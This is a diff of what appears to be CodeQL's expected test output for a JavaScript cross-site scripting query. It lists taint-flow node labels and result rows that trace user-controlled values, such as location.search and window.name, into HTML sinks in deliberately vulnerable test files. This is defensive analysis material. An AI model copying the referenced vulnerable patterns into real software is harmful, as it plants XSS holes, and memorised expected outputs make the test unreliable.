semmle.label | tainted | -| sanitiser.js:38:21:38:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:38:29:38:35 | tainted | semmle.label | tainted | -| sanitiser.js:45:21:45:44 | '' + ... '' | semmle.label | '' + ... '' | -| sanitiser.js:45:29:45:35 | tainted | semmle.label | tainted | -| sanitiser.js:48:19:48:25 | tainted | semmle.label | tainted | -| sanitiser.js:48:19:48:46 | tainted ... /g, '') | semmle.label | tainted ... /g, '') | -| stored-xss.js:2:39:2:62 | documen ... .search | semmle.label | documen ... .search | -| stored-xss.js:3:35:3:58 | documen ... .search | semmle.label | documen ... .search | -| stored-xss.js:5:20:5:52 | session ... ssion') | semmle.label | session ... ssion') | -| stored-xss.js:8:20:8:48 | localSt ... local') | semmle.label | localSt ... local') | -| stored-xss.js:10:9:10:44 | href | semmle.label | href | -| stored-xss.js:10:16:10:44 | localSt ... local') | semmle.label | localSt ... local') | -| stored-xss.js:12:20:12:54 | "" | semmle.label | "" | -| stored-xss.js:12:35:12:38 | href | semmle.label | href | -| string-manipulations.js:3:16:3:32 | document.location | semmle.label | document.location | -| string-manipulations.js:4:16:4:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:5:16:5:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:5:16:5:47 | documen ... lueOf() | semmle.label | documen ... lueOf() | -| string-manipulations.js:6:16:6:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:6:16:6:43 | documen ... f.sup() | semmle.label | documen ... f.sup() | -| string-manipulations.js:7:16:7:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:7:16:7:51 | documen ... rCase() | semmle.label | documen ... rCase() | -| string-manipulations.js:8:16:8:37 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:8:16:8:48 | documen ... mLeft() | semmle.label | documen ... mLeft() | -| string-manipulations.js:9:16:9:58 | String. ... n.href) | semmle.label | String. ... n.href) | -| string-manipulations.js:9:36:9:57 | documen ... on.href | semmle.label | documen ... on.href | -| string-manipulations.js:10:16:10:45 | String( ... n.href) | semmle.label | String( ... n.href) | -| string-manipulations.js:10:23:10:44 | documen ... on.href | semmle.label | documen ... on.href | -| tainted-url-suffix-arguments.js:3:17:3:17 | y | semmle.label | y | -| tainted-url-suffix-arguments.js:6:22:6:22 | y | semmle.label | y | -| tainted-url-suffix-arguments.js:11:11:11:36 | url | semmle.label | url | -| tainted-url-suffix-arguments.js:11:17:11:36 | window.location.href | semmle.label | window.location.href | -| tainted-url-suffix-arguments.js:12:17:12:19 | url | semmle.label | url | -| tooltip.jsx:6:11:6:30 | source | semmle.label | source | -| tooltip.jsx:6:20:6:30 | window.name | semmle.label | window.name | -| tooltip.jsx:10:25:10:30 | source | semmle.label | source | -| tooltip.jsx:11:25:11:30 | source | semmle.label | source | -| tooltip.jsx:17:11:17:33 | provide [source] | semmle.label | provide [source] | -| tooltip.jsx:17:21:17:33 | props.provide [source] | semmle.label | props.provide [source] | -| tooltip.jsx:18:51:18:57 | provide [source] | semmle.label | provide [source] | -| tooltip.jsx:18:51:18:59 | provide() | semmle.label | provide() | -| tooltip.jsx:22:11:22:30 | source | semmle.label | source | -| tooltip.jsx:22:20:22:30 | window.name | semmle.label | window.name | -| tooltip.jsx:23:38:23:43 | source | semmle.label | source | -| translate.js:6:7:6:39 | target | semmle.label | target | -| translate.js:6:16:6:39 | documen ... .search | semmle.label | documen ... .search | -| translate.js:7:7:7:61 | searchParams | semmle.label | searchParams | -| translate.js:7:7:7:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:7:22:7:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| translate.js:7:42:7:47 | target | semmle.label | target | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:7:42:7:60 | target.substring(1) | semmle.label | target.substring(1) | -| translate.js:9:27:9:38 | searchParams | semmle.label | searchParams | -| translate.js:9:27:9:38 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| translate.js:9:27:9:50 | searchP ... 'term') | semmle.label | searchP ... 'term') | -| trusted-types-lib.js:1:28:1:28 | x | semmle.label | x | -| trusted-types-lib.js:2:12:2:12 | x | semmle.label | x | -| trusted-types.js:3:62:3:62 | x | semmle.label | x | -| trusted-types.js:3:67:3:67 | x | semmle.label | x | -| trusted-types.js:4:20:4:30 | window.name | semmle.label | window.name | -| trusted-types.js:13:20:13:30 | window.name | semmle.label | window.name | -| tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | semmle.label | JSON.pa ... tr(1))) | -| tst3.js:2:23:2:74 | decodeU ... str(1)) | semmle.label | decodeU ... str(1)) | -| tst3.js:2:42:2:63 | window. ... .search | semmle.label | window. ... .search | -| tst3.js:2:42:2:73 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst3.js:4:25:4:28 | data | semmle.label | data | -| tst3.js:4:25:4:32 | data.src | semmle.label | data.src | -| tst3.js:5:26:5:29 | data | semmle.label | data | -| tst3.js:5:26:5:31 | data.p | semmle.label | data.p | -| tst3.js:7:32:7:35 | data | semmle.label | data | -| tst3.js:7:32:7:37 | data.p | semmle.label | data.p | -| tst3.js:9:37:9:40 | data | semmle.label | data | -| tst3.js:9:37:9:42 | data.p | semmle.label | data.p | -| tst3.js:10:38:10:41 | data | semmle.label | data | -| tst3.js:10:38:10:43 | data.p | semmle.label | data.p | -| tst.js:2:7:2:39 | target | semmle.label | target | -| tst.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:5:18:5:23 | target | semmle.label | target | -| tst.js:8:18:8:126 | "" | semmle.label | "" | -| tst.js:8:37:8:58 | documen ... on.href | semmle.label | documen ... on.href | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:8:37:8:114 | documen ... t=")+8) | semmle.label | documen ... t=")+8) | -| tst.js:12:5:12:42 | '
    ' | semmle.label | '
    ' | -| tst.js:12:28:12:33 | target | semmle.label | target | -| tst.js:17:7:17:56 | params | semmle.label | params | -| tst.js:17:7:17:56 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | semmle.label | (new UR ... ation)) [searchParams, MapValue] | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | semmle.label | (new UR ... ation)) [searchParams] | -| tst.js:17:16:17:56 | (new UR ... hParams | semmle.label | (new UR ... hParams | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | semmle.label | (new UR ... hParams [MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:17:25:17:41 | document.location | semmle.label | document.location | -| tst.js:18:18:18:23 | params | semmle.label | params | -| tst.js:18:18:18:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:18:18:18:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:20:7:20:61 | searchParams | semmle.label | searchParams | -| tst.js:20:7:20:61 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:20:22:20:61 | new URL ... ing(1)) | semmle.label | new URL ... ing(1)) | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | semmle.label | new URL ... ing(1)) [MapValue] | -| tst.js:20:42:20:47 | target | semmle.label | target | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:20:42:20:60 | target.substring(1) | semmle.label | target.substring(1) | -| tst.js:21:18:21:29 | searchParams | semmle.label | searchParams | -| tst.js:21:18:21:29 | searchParams [MapValue] | semmle.label | searchParams [MapValue] | -| tst.js:21:18:21:41 | searchP ... 'name') | semmle.label | searchP ... 'name') | -| tst.js:24:14:24:19 | target | semmle.label | target | -| tst.js:26:18:26:23 | target | semmle.label | target | -| tst.js:28:5:28:28 | documen ... .search | semmle.label | documen ... .search | -| tst.js:31:10:31:33 | documen ... .search | semmle.label | documen ... .search | -| tst.js:34:16:34:20 | bar() | semmle.label | bar() | -| tst.js:36:14:36:14 | x | semmle.label | x | -| tst.js:37:10:37:10 | x | semmle.label | x | -| tst.js:40:16:40:44 | baz(doc ... search) | semmle.label | baz(doc ... search) | -| tst.js:40:20:40:43 | documen ... .search | semmle.label | documen ... .search | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:42:15:42:15 | s | semmle.label | s | -| tst.js:43:10:43:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:43:20:43:20 | s | semmle.label | s | -| tst.js:46:16:46:45 | wrap(do ... search) | semmle.label | wrap(do ... search) | -| tst.js:46:21:46:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:48:15:48:15 | s | semmle.label | s | -| tst.js:50:12:50:12 | s | semmle.label | s | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:50:12:50:22 | s.substr(1) | semmle.label | s.substr(1) | -| tst.js:54:16:54:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:54:21:54:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:56:16:56:45 | chop(do ... search) | semmle.label | chop(do ... search) | -| tst.js:56:21:56:44 | documen ... .search | semmle.label | documen ... .search | -| tst.js:58:16:58:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:21:58:31 | chop(bar()) | semmle.label | chop(bar()) | -| tst.js:58:26:58:30 | bar() | semmle.label | bar() | -| tst.js:60:34:60:34 | s | semmle.label | s | -| tst.js:62:18:62:18 | s | semmle.label | s | -| tst.js:64:25:64:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:65:25:65:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:68:16:68:20 | bar() | semmle.label | bar() | -| tst.js:70:1:70:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | -| tst.js:70:3:70:26 | documen ... .search | semmle.label | documen ... .search | -| tst.js:70:46:70:46 | x | semmle.label | x | -| tst.js:73:20:73:20 | x | semmle.label | x | -| tst.js:77:49:77:72 | documen ... .search | semmle.label | documen ... .search | -| tst.js:81:26:81:49 | documen ... .search | semmle.label | documen ... .search | -| tst.js:82:25:82:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:84:33:84:56 | documen ... .search | semmle.label | documen ... .search | -| tst.js:85:32:85:55 | documen ... .search | semmle.label | documen ... .search | -| tst.js:90:39:90:62 | documen ... .search | semmle.label | documen ... .search | -| tst.js:96:30:96:53 | documen ... .search | semmle.label | documen ... .search | -| tst.js:102:25:102:48 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:7:107:44 | v | semmle.label | v | -| tst.js:107:11:107:34 | documen ... .search | semmle.label | documen ... .search | -| tst.js:107:11:107:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:110:18:110:18 | v | semmle.label | v | -| tst.js:136:18:136:18 | v | semmle.label | v | -| tst.js:148:29:148:50 | window. ... .search | semmle.label | window. ... .search | -| tst.js:151:29:151:29 | v | semmle.label | v | -| tst.js:151:49:151:49 | v | semmle.label | v | -| tst.js:155:29:155:46 | xssSourceService() | semmle.label | xssSourceService() | -| tst.js:158:40:158:61 | window. ... .search | semmle.label | window. ... .search | -| tst.js:177:9:177:41 | target | semmle.label | target | -| tst.js:177:18:177:41 | documen ... .search | semmle.label | documen ... .search | -| tst.js:180:28:180:33 | target | semmle.label | target | -| tst.js:184:9:184:42 | tainted | semmle.label | tainted | -| tst.js:184:19:184:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:186:31:186:37 | tainted | semmle.label | tainted | -| tst.js:188:42:188:48 | tainted | semmle.label | tainted | -| tst.js:189:33:189:39 | tainted | semmle.label | tainted | -| tst.js:191:54:191:60 | tainted | semmle.label | tainted | -| tst.js:192:45:192:51 | tainted | semmle.label | tainted | -| tst.js:193:49:193:55 | tainted | semmle.label | tainted | -| tst.js:197:9:197:42 | tainted | semmle.label | tainted | -| tst.js:197:19:197:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:199:67:199:73 | tainted | semmle.label | tainted | -| tst.js:200:67:200:73 | tainted | semmle.label | tainted | -| tst.js:204:35:204:41 | tainted | semmle.label | tainted | -| tst.js:206:46:206:52 | tainted | semmle.label | tainted | -| tst.js:207:38:207:44 | tainted | semmle.label | tainted | -| tst.js:208:35:208:41 | tainted | semmle.label | tainted | -| tst.js:212:28:212:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | -| tst.js:213:28:213:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | -| tst.js:214:28:214:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | -| tst.js:218:32:218:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | -| tst.js:225:28:225:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | -| tst.js:226:28:226:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | -| tst.js:227:28:227:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | -| tst.js:231:32:231:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | -| tst.js:236:35:236:41 | tainted | semmle.label | tainted | -| tst.js:238:20:238:26 | tainted | semmle.label | tainted | -| tst.js:240:23:240:29 | tainted | semmle.label | tainted | -| tst.js:241:23:241:29 | tainted | semmle.label | tainted | -| tst.js:247:39:247:55 | props.propTainted | semmle.label | props.propTainted | -| tst.js:251:60:251:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | -| tst.js:255:23:255:29 | tainted | semmle.label | tainted | -| tst.js:259:7:259:17 | window.name | semmle.label | window.name | -| tst.js:260:7:260:10 | name | semmle.label | name | -| tst.js:264:11:264:21 | window.name | semmle.label | window.name | -| tst.js:280:22:280:29 | location | semmle.label | location | -| tst.js:285:9:285:29 | tainted | semmle.label | tainted | -| tst.js:285:19:285:29 | window.name | semmle.label | window.name | -| tst.js:288:59:288:65 | tainted | semmle.label | tainted | -| tst.js:301:9:301:16 | location | semmle.label | location | -| tst.js:302:10:302:10 | e | semmle.label | e | -| tst.js:303:20:303:20 | e | semmle.label | e | -| tst.js:308:10:308:17 | location | semmle.label | location | -| tst.js:310:10:310:10 | e | semmle.label | e | -| tst.js:311:20:311:20 | e | semmle.label | e | -| tst.js:316:35:316:42 | location | semmle.label | location | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | -| tst.js:327:10:327:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | -| tst.js:327:18:327:34 | document.location | semmle.label | document.location | -| tst.js:331:7:331:43 | params | semmle.label | params | -| tst.js:331:7:331:43 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | -| tst.js:331:16:331:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | -| tst.js:331:16:331:43 | getTain ... hParams | semmle.label | getTain ... hParams | -| tst.js:331:16:331:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | -| tst.js:332:18:332:23 | params | semmle.label | params | -| tst.js:332:18:332:23 | params [MapValue] | semmle.label | params [MapValue] | -| tst.js:332:18:332:35 | params.get('name') | semmle.label | params.get('name') | -| tst.js:341:12:341:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | -| tst.js:341:20:341:36 | document.location | semmle.label | document.location | -| tst.js:343:5:343:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | -| tst.js:343:5:343:17 | getUrl().hash | semmle.label | getUrl().hash | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | -| tst.js:348:7:348:39 | target | semmle.label | target | -| tst.js:348:16:348:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:349:12:349:17 | target | semmle.label | target | -| tst.js:355:10:355:42 | target | semmle.label | target | -| tst.js:355:19:355:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:356:16:356:21 | target | semmle.label | target | -| tst.js:357:20:357:25 | target | semmle.label | target | -| tst.js:360:21:360:26 | target | semmle.label | target | -| tst.js:363:18:363:23 | target | semmle.label | target | -| tst.js:371:7:371:39 | target | semmle.label | target | -| tst.js:371:16:371:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:374:18:374:23 | target | semmle.label | target | -| tst.js:381:7:381:39 | target | semmle.label | target | -| tst.js:381:16:381:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:384:18:384:23 | target | semmle.label | target | -| tst.js:386:18:386:23 | target | semmle.label | target | -| tst.js:386:18:386:29 | target.taint | semmle.label | target.taint | -| tst.js:391:3:391:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | -| tst.js:391:19:391:42 | documen ... .search | semmle.label | documen ... .search | -| tst.js:392:18:392:23 | target [taint3] | semmle.label | target [taint3] | -| tst.js:392:18:392:30 | target.taint3 | semmle.label | target.taint3 | -| tst.js:397:18:397:23 | target | semmle.label | target | -| tst.js:397:18:397:30 | target.taint5 | semmle.label | target.taint5 | -| tst.js:406:18:406:23 | target | semmle.label | target | -| tst.js:406:18:406:30 | target.taint7 | semmle.label | target.taint7 | -| tst.js:408:3:408:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | -| tst.js:408:19:408:24 | target | semmle.label | target | -| tst.js:408:19:408:24 | target [taint8] | semmle.label | target [taint8] | -| tst.js:408:19:408:31 | target.taint8 | semmle.label | target.taint8 | -| tst.js:409:18:409:23 | target [taint8] | semmle.label | target [taint8] | -| tst.js:409:18:409:30 | target.taint8 | semmle.label | target.taint8 | -| tst.js:416:7:416:46 | payload | semmle.label | payload | -| tst.js:416:17:416:36 | window.location.hash | semmle.label | window.location.hash | -| tst.js:416:17:416:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | -| tst.js:417:18:417:24 | payload | semmle.label | payload | -| tst.js:419:7:419:55 | match | semmle.label | match | -| tst.js:419:15:419:34 | window.location.hash | semmle.label | window.location.hash | -| tst.js:419:15:419:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | -| tst.js:421:20:421:24 | match | semmle.label | match | -| tst.js:421:20:421:27 | match[1] | semmle.label | match[1] | -| tst.js:424:18:424:37 | window.location.hash | semmle.label | window.location.hash | -| tst.js:424:18:424:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | -| tst.js:424:18:424:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | -| tst.js:428:7:428:39 | target | semmle.label | target | -| tst.js:428:16:428:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:430:18:430:23 | target | semmle.label | target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | -| typeahead.js:20:13:20:45 | target | semmle.label | target | -| typeahead.js:20:22:20:45 | documen ... .search | semmle.label | documen ... .search | -| typeahead.js:21:12:21:17 | target | semmle.label | target | -| typeahead.js:24:30:24:32 | val | semmle.label | val | -| typeahead.js:25:18:25:20 | val | semmle.label | val | -| various-concat-obfuscations.js:2:6:2:39 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:2:16:2:39 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:4:4:4:31 | "
    " ...
    " | semmle.label | "
    " ...
    " | -| various-concat-obfuscations.js:4:14:4:20 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:5:4:5:26 | `
    $ ...
    ` | semmle.label | `
    $ ...
    ` | -| various-concat-obfuscations.js:5:12:5:18 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:6:4:6:26 | "
    " ... ainted) | semmle.label | "
    " ... ainted) | -| various-concat-obfuscations.js:6:4:6:43 | "
    " ... /div>") | semmle.label | "
    " ... /div>") | -| various-concat-obfuscations.js:6:19:6:25 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:7:4:7:31 | ["
    ... /div>"] | semmle.label | ["
    ... /div>"] | -| various-concat-obfuscations.js:7:4:7:38 | ["
    ... .join() | semmle.label | ["
    ... .join() | -| various-concat-obfuscations.js:7:14:7:20 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:9:4:9:34 | "
    " | semmle.label | "
    " | -| various-concat-obfuscations.js:9:19:9:25 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:10:4:10:27 | `
    ` | semmle.label | `
    ` | -| various-concat-obfuscations.js:10:16:10:22 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:11:4:11:31 | "
    ") | semmle.label | "
    ") | -| various-concat-obfuscations.js:11:24:11:30 | tainted | semmle.label | tainted | -| various-concat-obfuscations.js:12:4:12:34 | ["
    "] | semmle.label | ["
    "] | -| various-concat-obfuscations.js:12:4:12:41 | ["
    ' | semmle.label | '
    ' | -| various-concat-obfuscations.js:15:27:15:55 | (attrs. ... 'left') | semmle.label | (attrs. ... 'left') | -| various-concat-obfuscations.js:15:28:15:32 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:17:24:17:28 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:18:10:18:59 | '
    ') | semmle.label | '
    ') | -| various-concat-obfuscations.js:18:10:18:105 | '
    ') [ArrayElement] | semmle.label | '
    ') [ArrayElement] | -| various-concat-obfuscations.js:18:32:18:36 | attrs | semmle.label | attrs | -| various-concat-obfuscations.js:18:32:18:58 | attrs.d ... 'left' | semmle.label | attrs.d ... 'left' | -| various-concat-obfuscations.js:20:4:20:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | -| various-concat-obfuscations.js:20:17:20:40 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:20:17:20:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | -| various-concat-obfuscations.js:21:4:21:47 | indirec ... .attrs) | semmle.label | indirec ... .attrs) | -| various-concat-obfuscations.js:21:17:21:40 | documen ... .search | semmle.label | documen ... .search | -| various-concat-obfuscations.js:21:17:21:46 | documen ... h.attrs | semmle.label | documen ... h.attrs | -| winjs.js:2:7:2:53 | tainted | semmle.label | tainted | -| winjs.js:2:17:2:40 | documen ... .search | semmle.label | documen ... .search | -| winjs.js:2:17:2:53 | documen ... ring(1) | semmle.label | documen ... ring(1) | -| winjs.js:3:43:3:49 | tainted | semmle.label | tainted | -| winjs.js:4:43:4:49 | tainted | semmle.label | tainted | +#select +| addEventListener.js:2:20:2:29 | event.data | addEventListener.js:1:43:1:47 | event | addEventListener.js:2:20:2:29 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:1:43:1:47 | event | user-provided value | +| addEventListener.js:6:20:6:23 | data | addEventListener.js:5:43:5:48 | {data} | addEventListener.js:6:20:6:23 | data | Cross-site scripting vulnerability due to $@. | addEventListener.js:5:43:5:48 | {data} | user-provided value | +| addEventListener.js:12:24:12:33 | event.data | addEventListener.js:10:21:10:25 | event | addEventListener.js:12:24:12:33 | event.data | Cross-site scripting vulnerability due to $@. | addEventListener.js:10:21:10:25 | event | user-provided value | +| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | Cross-site scripting vulnerability due to $@. | angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | user-provided value | +| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | angular2-client.ts:26:44:26:69 | this.ro ... .params | angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:26:44:26:69 | this.ro ... .params | user-provided value | +| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | angular2-client.ts:27:44:27:74 | this.ro ... yParams | angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:27:44:27:74 | this.ro ... yParams | user-provided value | +| angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | angular2-client.ts:28:44:28:71 | this.ro ... ragment | Cross-site scripting vulnerability due to $@. | angular2-client.ts:28:44:28:71 | this.ro ... ragment | user-provided value | +| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | user-provided value | +| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | user-provided value | +| angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | angular2-client.ts:32:46:32:59 | map.get('foo') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:32:46:32:59 | map.get('foo') | user-provided value | +| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | Cross-site scripting vulnerability due to $@. | angular2-client.ts:35:44:35:74 | this.ro ... 1].path | user-provided value | +| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | angular2-client.ts:36:44:36:80 | this.ro ... ameters | angular2-client.ts:36:44:36:82 | this.ro ... eters.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:36:44:36:80 | this.ro ... ameters | user-provided value | +| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | Cross-site scripting vulnerability due to $@. | angular2-client.ts:37:44:37:91 | this.ro ... et('x') | user-provided value | +| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | angular2-client.ts:38:44:38:89 | this.ro ... .params | angular2-client.ts:38:44:38:91 | this.ro ... arams.x | Cross-site scripting vulnerability due to $@. | angular2-client.ts:38:44:38:89 | this.ro ... .params | user-provided value | +| angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | angular2-client.ts:40:44:40:58 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:40:44:40:58 | this.router.url | user-provided value | +| angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | angular2-client.ts:42:45:42:59 | this.router.url | Cross-site scripting vulnerability due to $@. | angular2-client.ts:42:45:42:59 | this.router.url | user-provided value | +| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | angular2-client.ts:43:75:43:105 | this.ro ... yParams | angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | Cross-site scripting vulnerability due to $@. | angular2-client.ts:43:75:43:105 | this.ro ... yParams | user-provided value | +| 